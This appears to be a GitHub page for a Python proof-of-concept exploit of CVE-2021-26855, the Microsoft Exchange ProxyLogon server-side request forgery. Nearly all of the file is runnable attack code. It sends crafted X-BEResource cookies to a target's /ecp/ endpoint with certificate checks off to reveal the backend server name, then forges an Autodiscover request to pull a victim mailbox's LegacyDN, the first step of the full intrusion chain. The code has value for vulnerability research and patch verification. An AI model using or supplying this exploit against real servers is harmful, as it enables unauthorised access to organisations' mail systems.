forked from myh0st/scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2021-26855_poc.py
59 lines (59 loc) · 2.69 KB
/
CVE-2021-26855_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)
# By Alex Hernandez aka alt3kx (c) Mar 2021")
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/")
# Usage: python ssrf_auto.py <target> <email>")
# Example: python ssrf_auto.py mail.exchange.com [email protected]")
#
#
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
import os
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
os.system('clear')
print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
print("By Alex Hernandez aka alt3kx (c) Mar 2021")
print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
print("Usage: python ssrf_auto.py <target> <email>")
print("Example: python ssrf_auto.py mail.exchange.com [email protected]")
exit()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % email
print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)
FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False, #proxies=proxies
)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=autoDiscoverBody,
verify=False,
#proxies=proxies
)
if ct.status_code != 200:
print("[-] Autodiscover Error!")
exit()
if "<LegacyDN>" not in ct.text:
print("[-] Can not get LegacyDN! from " + email)
exit()
print(ct.text)